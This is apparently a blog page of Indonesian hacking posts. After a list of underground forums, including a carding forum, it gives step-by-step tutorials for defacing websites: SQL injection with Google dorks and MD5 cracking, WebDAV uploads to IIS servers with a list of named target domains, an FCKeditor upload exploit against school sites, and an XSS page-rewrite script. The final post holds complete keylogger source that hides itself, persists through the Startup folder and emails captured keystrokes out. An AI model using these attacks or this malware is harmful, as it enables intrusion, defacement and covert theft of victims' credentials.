Forum-Forum Underground yang Ada di Indonesia

Forum-Forum Underground yang Ada di Indonesia | Soldier Network - Kalian suka main diforum "underground" ngga? Itu lho... forum yang isinya membahas tentang dunia security, hacking, carding, defacing, sing... sing... apalah wkwk XD yang pasti semua threadnya berkaitan dengan dunia IT. Nah dipostingan kali ini saya akan membahas beberapa forum underground yang ada di Indonesia. Maaf Kalo agak berantakan postingnya :D

Berikut Forum-Forum Underground yang Ada di Indonesia :

1. Hacker Newbie - Community
Siapa yang tak kenal HN-Community, forum underground yang identik dengan icon "tengkorak dengan mata merah berkedip" ini merupakan salah satu forum underground favorite saya. Tampilan forumnya itu yang bikin saya suka, dan juga para adminnya yang ramah-ramah :D

Link Menuju Forum : http://hacker-newbie.org/

2. Devilzc0de
Berawal dari sekumpulan anak-anak Tangerang yang bergabung di salah satu Forum Hacker Terbesar Indonesia. Mereka saling berbagi ilmu yang mereka miliki sesama member lainnya. Sedikit demi sedikit mereka kenal dan saling mengenal dengan member yang lainnya. Terutama sesama member yang terkhusus untuk daerah Tangerang, mereka lebih mempererat tali silaturahminya. Mungkin mereka pikir dengan mengenal member yang satu daerah, selain akrab di dunia Maya juga bisa akrab di dunia Nyata untuk bisa saling berbagi ilmu Hacking secara langsung.

Link Menuju Forum : http://devilzc0de.org/forum/

3. YogyaCarderLink
Merupakan salah satu Forum Carder ternama di Indonesia. Sudah keliatan dari namanya Yogya"Carder Link" : "Tukang Main Kartu" eitts... bukan kartu poker lho, tapi kartu ATM, VISA, Paypal dll. Disana adalah tempatnya para carder belajar membobol kartu ATM, VISA, Paypall dsb. Tapi ngga hanya belajar membobol kartu lho, Yogyacarderlink juga sering melakukan aksi defacing dibeberapa situs luar dan dalam negeri.

Link Menuju Forum : https://yogyacarderlink.web.id/

4. Palembang Hacker Link
Merupakan forum underground indonesia yang bermarkas di Palembang. Forum ini sempat vakum akibat Serangan deface oleh decafer asal Medan Alex_own5. Namun sekarang PHL sudah pulih kembali dan aktif hingga saat ini.

Link Menuju Forum : http://palembanghackerlink.com/

5. XCode - Yogya Family Code
Adalah forum underground yang bermarkas di Kota Yogyakarta. Semua tutorial hacking ada semua disini. Forum ini masih satu kerabat dengan YogyaCarderLink.

Link Menuju Forum : http://www.xcode.or.id/forum/

Daftar diatas saya ambil dari berbagai sumber, jadi kalo sobat ragu dengan penjelasan diatas saya bisa memaklumi. Sekian postingan saya kali ini tentang daftar Forum-Forum Underground yang Ada di Indonesia. semoga postingan saya ini bisa bermanfaat bagi sobat semua.

17.05  Unknown  No comments

Read More

Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7

Soldier Network - Ada tutorial hacking website lagi nih, lumayan SQL Injection. Kalo sebelumnya saya pernah share tentang Cara Deface Website Forum Sederhana Untuk Newbie yang tutorialnya pake skema "order+by+bla.. bla.. bla" nah sekarang saya akan share tentang cara deface lagi nih sob, tapi yang ini lebih mudah karena kita pake software, jadi tinggal klak-klik aja juga kelar. Tapi ada efek sampingnya juga pake cara ini, Bikin Orang Jadi Males hahaha :D Tapi kalo udah tau dasarnya yang pake "order+by+ bla... bla..." it's ok lah, yang penting kita tau jalannya klo disuruh manual, kalo belum tau cara manualnya baca ini dulu Cara Hacking Website Dengan Teknik SQL Injection :D

Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7

Yang pertama dan wajib ada yaitu Toolsnya:

• SQLi Helper 2.7 | 127 KB
• Password: cirebon-cyber4rt

Langkah kedua adalah mencari website yang vulnerabillity ( terdapat celah keamanan ), Lah carinya dimana? gampang sob, cari aja di Google :D ada banyak disana. Akh males nyarinya, yaudah nih aku kasih dorknya aja biar lebih mudah. Caranya? caranya masukan dork dibawah ini ke mesin pencarian Google, nanti muncul seribu satu macam website yang sama, nah tinggal kamu pilih satu-satu, cari yang vuln ( terdapat celah keamanan ), OK.

Google Dork SQL Injection

• inurl:index.php?id=
• inurl:trainers.php?id=
• inurl:buy.php?category= 
• inurl:article.php?ID= 
• inurl:play_old.php?id= 
• inurl:games.php?id= 

Maka akan muncul seribu satu macam website yang url-nya mirip seperti yang saya contohkan diatas. Sebenarnya masih banyak script atau dork SQL yang bisa kita dapatkan di internet. Nanti di artikel berikutnya, saya akan coba memberikannya secara lengkap untuk sobat.

Langkah ketiga, Sebelum memulai attacking kita harus menemukan website yang bisa dihack ( vulnerabillity ). Dari ribuan website dari dork yang saya berikan diatas, belum tentu salah satunya yang bisa dihack. Untuk mengetahuinya kita harus memberi tanda petik di akhir alamat website.

Contoh: http://www.wheelieboymotorsports.com/product_detail.php?pid=316 menjadi http://www.wheelieboymotorsports.com/product_detail.php?pid=316'. Jika terdapat tulisan

• Query failed.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname. Atau Sebagainya yang mirip.

Berarti Website tersebut bisa dihack ( vuln )
Copy Url yang sobat dapatkan tadi ke kolom target.
Contoh: http://www.wheelieboymotorsports.com/product_detail.php?pid=316. ( tidak pakai tanda petik )

Kemudian klik Inject. Maka secara otomatis tools akan memeriksa ulang apakah url tersebut vuln atau tidak, versi database, supports union, dll. Jika Inject berhasil akan muncul tampilan seperti ini.

Kalau sudah klik Get Database.
*Di contoh muncul 2 Database name. Information schema dan natural. Pilih database selain Information schema. Seperti contoh dibawah, saya memilih database natural. Selanjutnya klik Get Tables.

Akan muncul beberapa list Tables yang ada. Sekarang tugas kita tinggal mencari tabel yang berisikan username dan password administratornya. Biasanya nama tabelnya tidak jauh-jauh dari admin_user, admin_login, atau apapun yang berbau informasi login admin.

Langkah Keempat, Kolom SQL
Jika sudah pilih User kalian klik get Coloumns.
Di Coloumns block yang usr_login dan usr_pass atau user_name dan password_admin lalu klik Dump Now.

Setelah itu akan muncul tampilan seperti ini

Pilih salah satu dari user login dan user password tersebut.

Ada yang aneh? Password yang ditampilkan bentuknya kok seperti ini ya?

• 987d29241cc4f2a7465f2d9356ab3615
• 987d29241cc4f2a7465f2d9356ab3615

Langkah Kelima, MD5 Password
Password tersebut dienkripsi dengan menggunakan metode MD5. Jadi kita harus menterjemahkan kode tersebut menjadi password yang sebenarnya. Nah, bagaimana caranya?

Caranya cukup mudah, buka saja situs MD5 Crack, lalu masukkan kode tersebut dikotak penelusuran. Berdo'a saja password yang sobat dapatkan tersebut cukup lemah, sehingga bisa dipecahkan dengan metode Bruto Force. Setelah sobat masukkan, lalu klik Crack hash baby.

Selesai. sekarang cari halaman login atau adminnya.
Ada beberapa halaman login yang bisa sobat pakai ( coba satu-satu )

• http://target.com/admin1.php/
• http://target.com/admin1.html
• http://target.com/admin2.php
• http://target.com/admin.php
• http://target.com/controlpanel/

NOTE - Bagi yang PC nya kedetect virus atau takut PC nya kena virus, bisa pake sandboxie biar lebih aman Click Here

Sekian postingan saya kali ini tentang Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7 , mungkin bagi yang belum tau teknik SQLi Injection cara diatas masih sangat sulit untuk dipahami, tapi saya yakin dengan latihan dan ketekunan pasti akan sobat akan paham.

Source : Cirebon Cyber4rt

16.59  Unknown  No comments

Read More

Cara Deface Website Dengan Web Folder

Kita mungkin pernah melihat halaman yang terkena aksi jahil terhadap situs tertentu oleh para defacer.

Lalu di dalam hati akan bertanya-tanya bagaimana cara melakukan itu??.

Mungkin kamu pernah membaca artikel tentang cara men-deface website dengan menggunakan teknik XSS, SQLi, LFI, RFI dll.

Namun percayalah, selain teknik tersebut masih ada teknik lain yang jauh lebih sederhana semudah copy paste file.

Bagaimana caranya??, yaitu dengan menggunakan web folder yang disediakan oleh OS Windows sendiri.

Namun perlu diketahui, teknik ini hanya berlaku untuk website yang menggunakan OS Windows dan server IIS 5.0/6.0 .

Lalu bagaimana cara mengetahui bahwa target kita menggunakan server IIS?

Mudah saja, silakan buka netcraft.com dan masukkan target kita ke textbox yang tersedia, maka akan kita dapatkan informasi website tersebut, termasuk OS dan server yang digunakan.

Jika kamu ingin mendapatkan target secara acak bisa menggunakan google dork dengan menggunakan keyword allinurl:*.asp , allinurl:*.aspx dan sebagainya.

OK, langsung kita mulai saja tutorialnya.

1. Buka My Computer lalu lihat icon web folder, lalu klik 2x icon web folder tersebut (Win 98/ME/2000).

Jika kamu menggunakan windows XP secara default tidak akan menemukan folder tersebut di My Computer, tapi kamu bisa membuat secara manual dengan membuat shortcut baru.

Berikut langkahnya :

- Klik kanan pada desktop, kemudian pilih New -> Shortcut .

- Maka akan ada popup yang meminta untuk memasukkan lokasi tujuan, lalu kamu masukkan alamat dibawah ini :

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

- Jika sudah silakan klik Next -> Next -> Finish.

- Jika shortcut nya sudah terbentuk, lalu klik 2x pada shortcut tersebut.

2. Jika kamu sudah berhasil membuka web folder tersebut kemudian klik kanan lalu pilih New – Web Folder

3. Lalu akan muncul popup yang meminta untuk memasukkan alamat tujuan. Sebagai contoh kamu masukkan http://www.aslty.com.cn sebagai target.

4. Kemudian klik Next dan tunggu sampai prosesnya selesai, lama tidaknya proses tergantung koneksi internetmu.

5. Buka folder yang sudah terbentuk, nama folder biasanya mengambil dari nama domain, jika domainnya adalah http://www.aslty.com.cn , maka nama foldernya jugahttp://www.aslty.com.cn.

6. Copy paste sebuah file html ke dalam web folder yang telah kamu buat ke folderwww.aslty.com.cn.

7. Jika proses copy paste selesai, sebagai contoh jika nama file kamu adalah “Raja_T3g4.htm” maka cara melihatnya adalah dengan membuka browser dan mengetikkan alamat http://www.huoliwawa.com/aboutme.html

Nie ane kasih kumpulan websitenya biar mudah :

zgsfjw.net
centro.anje.pt
www.ziangli.com
6.shicheng.gov.cn
www.ville-mordelles.fr
www.podiocom.com
www.journeezerotracas.fr
www.journeezerotracas.com
www.journee0tracas.com
www.comune.torrice.fr.it
www.chinamaster88.com
www.chateaudelepinay.fr
www.centroformazioneitalia.it
www.bjautoobd.com
www.autodiagtool.com
usa.automotormaster.com
so-sighty.fr
perros-guirec.icor.fr
myhealthcity.com
malaysiahealthcareindonesia.com
lapetitehublais.fr
handistar.fr
gz.autoobd-ii.com
gz.automotormaster.com
expert-comptable-35.fr
carrelages-palmieri.com
camion-road-show.com
autoobd.cn
hibis.co.id
www.zjgsxy.com

Kalau mau dapet website lebih lainnya bisa di dork di google :

inurl:.ah.cn/*.asp

inurl:.bj.cn/*.asp

inurl:.cq.cn/*.asp

inurl:.fj.cn/*.asp

inurl:.gd.cn/*.asp

inurl:.gs.cn/*.asp

inurl:.gz.cn/*.asp

inurl:.gx.cn/*.asp

inurl:.ha.cn/*.asp

inurl:.hb.cn/*.asp

inurl:.he.cn/*.asp

inurl:.hi.cn/*.asp

inurl:.hl.cn/*.asp

inurl:.hn.cn/*.asp

inurl:.jl.cn/*.asp

inurl:.js.cn/*.asp

inurl:.jx.cn/*.asp

inurl:.ln.cn/*.asp

inurl:.nm.cn/*.asp

inurl:.nx.cn/*.asp

inurl:.qh.cn/*.asp

inurl:.sc.cn/*.asp

inurl:.sd.cn/*.asp

inurl:.sh.cn/*.asp

inurl:.sn.cn/*.asp

inurl:.sx.cn/*.asp

inurl:.tj.cn/*.asp

inurl:.tw.cn/*.asp

inurl:.xj.cn/*.asp

inurl:.xz.cn/*.asp

inurl:.yn.cn/*.asp

inurl:.zj.cn/*.asp

inurl:.ac.cn/*.asp

inurl:.com.cn/*.asp

inurl:.edu.cn/*.asp

inurl:.gov.cn/*.asp

inurl:.net.cn/*.asp

inurl:.org.cn/*.asp

Catatan : Saya mempraktekan metode ini dengan windows XP, dan setelah di coba ternyata bisa di gunakan di semua Windows XP.

Saran saya adalah , Gunakan ilmu yang anda peroleh untuk kebaikan , karena baik dan buruknya tergantung dari pribadi masing masing.

Source : Eggi

Don't Learn to Hack, but Hack to Learn

16.56  Unknown  No comments

Read More

Deface Website Sch.id

Deface Website Sch.id - Sobat X-Techno :) Selamat Pagi Bertemu lagi, kali ini admin mau update yang mengenai deface website. Gak usah lama lama yah, langsung aja kita liat ini, Cekidott...

1. Siapkan file format .txt. ( bisa di buat di notepad ). 

2. Buka Google lalu masukan Dork: 
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php? 

 Terserah sobat mau pilih yang mana. Sebagai contoh admin pilih ini aja
www.smkn1kuta.sch.id/

3. Exploit: /editor/filemanager/connectors/test.html 
Kalo bingung masukin Exploit nya, ini contohnya

eX: www.smkn1kuta.sch.id/

di masukin Exploit jadi begini 

   www.smkn1kuta.sch.id/editor/filemanager/connectors/test.html,
 Nahh begitu ujung nya di tambahin :D
Tekan Enter dehh atau masuk kesana , dan akan terlihat seperti ini 

Nah sekarang di kolom Connector yang defaultnya ASP jadikan PHP trus resource type nya ganti file. Trus klik Browse....... cari file.txt sobat..........kalo sudah klik open dan klik Upload

 

 Hasil nya akan seperti gambar yang di atas bila BERHASIL

Selain itu ada kemungkinan gagal. Banyak kemungkinan, mungkin nama file sudah ada sehingga akan menambah sesuatu seperti (1). Ok lanjut, terus cara ngeliat hasil nya

http://www.[site].sch.id/userfiles/file/namafilesobat.txt

http://www.[site].sch.id/userfiles/namafilesobat.txt

Selesai :D Kamu telah berhasil men-Deface nya walaupun bukan di Index nya (oops :)

Semoga Berhasil dan Semoga Bermanfaat ^_^

Jangan di Salah Gunakan Yha !!

Source : Kayu Agung

16.53  Unknown  No comments

Read More

Cara Sederhana Deface blog

Cara Sederhana Deface Blog - Assalamualikum Sobat X-Techno  :) Selamat Siang.Nah sekarang mau update lagi. Yapz mengenai " Cara Sederhana Deface Blog ". Sebenarnya ini bukan deface permanent, cara ini menggunakan script hasil ngutak-atik script salam penyambut di blog sob, ini hanyalah permainan injeksi script sob dan jangan berharap kamu bisa deface blog secara permanent dengan cara ini, tapi gak apalah untuk having fun saja :D. Ok Langsung aja yha ' Cekidott

1. Cari dan buka blog yang mempunyai salam pembuka saat baru dibuka, untuk belajar silahkan cari sendiri yha !! heh.e kasih contoh blognya deh, contoh blog: Klik Disini



2. Masukan script dibawah ini di kotak 'Nama Anda' (kata-kata discriptnya bisa kamu ganti sob)

<script>document.body.innerHTML="<h1>Touched By Black_Angel</h1>
This Site Has been Defaced By : Black_Angel<br/>
Greetz To : All Indonesian Underground Community<br/>
Visit http://black-angel-cyber4rt.blogspot.com/";</script>

3. Klik 'ok' dan lihat hasilnya



sekian tutorialnyha, maaf kalau kecewa, saya bukan Hacker sob, saya hanya Script Kiddies :D
Semoga Berhasil dan Bermanfaat ^_^


Source : Andi Techno

16.52  Unknown  No comments

Read More

Cara Membuat Logic Keylogger

Bahan Yang Di Gunakan :
*Visual Basic CEKIDOT
*Biasa ny saat menginstal VB,. VB akan meminta Instal NetFramework version1.1.432 terlebih dahulu CEKIDOT

Cara Pembuatan :
Step A:
mari memulai ,buka VB.net lalu pilih File->New project ->"Windows Forms Application" beri nama "Logic Keylogger"lalu Ok

sekarang kita akan membuat tampilan seperti dibawah ini,masuk ke Toolbox (dikiri) dan tambahkan 2 text box,2 labels,dan satu Tombol,atur tampilan nya menjadi seperti dibawah ini
1.buat seperti di gambar


2.sekarang klik kanan di form dan klik view code,CTRL-A lalu delete
Dan Copy Paste kode dibawah ini:

Imports System.IO
Public Class Form1
Dim stub, text1, text2 As String
Const FileSplit = "@vorfin@"
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
For Fadein = 0.0 To 1.1 Step 0.1
Me.Opacity = Fadein
Me.Refresh()
Threading.Thread.Sleep(100)
Next
End Sub
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
text1 = TextBox1.Text
text2 = TextBox2.Text
FileOpen(1, Application.StartupPath & "\Stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
stub = Space(LOF(1))

3.setelah itu pilih File-> Save All.Lalu klik Build,Build Logic Keylogger.

Oke builder uda dibuat

Step B:

kita buat file stub nya

1.klik File -> New project->Form Application->Stub-> OK.
2.
di form ini kita tambahkan 3 timers,di bawah kanan rubah times seperti berikut

Timer1-Interval=100
Timer2-Interval=900000
Timer3-Interval=900100

ubah nama form tersebut mnjadi "Windows Run .dll",set opacity menjadi 0% dan ubah "Show Icon In Taskbar" menjadi false.

tambahkan 3 text box seperti ini


Text Box yang gede = Text Box 1(set menjadi "Enabled=False")
Text box kiri = Text box 2
Text box kanan = Text box 3

3.Seperti tadi ,..Klik kanan -> view Code->delete ,paste kan code ini:

Spoiler:

Imports System.IO
Imports System.Net.Mail
Public Class Form1
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Dim options(), text1, text2 As String
Const FileSplit = "@vorfin@"
Dim Lserver As String = IO.Path.GetFileName(Application.ExecutablePath)
Dim vDirectory As String
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
text1 = Space(LOF(1))
text2 = Space(LOF(1))
FileGet(1, text1)
FileGet(1, text2)
FileClose(1)
options = Split(text1, FileSplit)
TextBox2.Text = options(1)
TextBox3.Text = options(2)
vDirectory = "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
Dim zDir As New DirectoryInfo(vDirectory)
If Not zDir.Exists Then
My.Computer.FileSystem.CopyFile(Application.ExecutablePath, "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\" & Lserver, True)
Else
My.Computer.FileSystem.CopyFile(Application.ExecutablePath, "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\" & Lserver, True)
End If
Timer1.Start()
Timer2.Start()
Timer3.Start()
End Sub
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
TextBox1.Text = TextBox1.Text + Chr(i)
End If
Next i
End Sub
Private Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.Tick
Dim MyMailMessage As New MailMessage
MyMailMessage.From = New MailAddress(TextBox2.Text)
MyMailMessage.To.Add(TextBox2.Text)
MyMailMessage.Subject = ("Logs")
MyMailMessage.Body = (TextBox1.Text)
Dim SMTPServer As New SmtpClient("smtp.gmail.com")
SMTPServer.Port = 587
SMTPServer.Credentials = New System.Net.NetworkCredential(TextBox2.Text, TextBox3.Text)
SMTPServer.EnableSsl = True
SMTPServer.Send(MyMailMessage)
End Sub
Private Sub Timer3_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer3.Tick
TextBox1.Clear()
End Sub
End Class

.lalu save lagi dan Build

Ctn:
Masuk ke "C\:Dir\Logic Keylogger\bin\release" lalu tambahkan .exe di desktop

lakukan yang sama terhadap stub nya

Run "Logic Keylogger" Enter Information,klik Build.

Selamat kamu baru aja membuat kylogger pertama kamu.

Note: Stub mungkin gak perlu di delete,tapi tidak di butuhkan untuk dikirim bersama server program nya.

Note: Keylogger ini akan mencoba memasuki startup folder di XP,untuk membuat startup di vista hapus kode ini di code yang ke-2
AND HAPPY ENDING

16.48  Unknown  No comments

Read More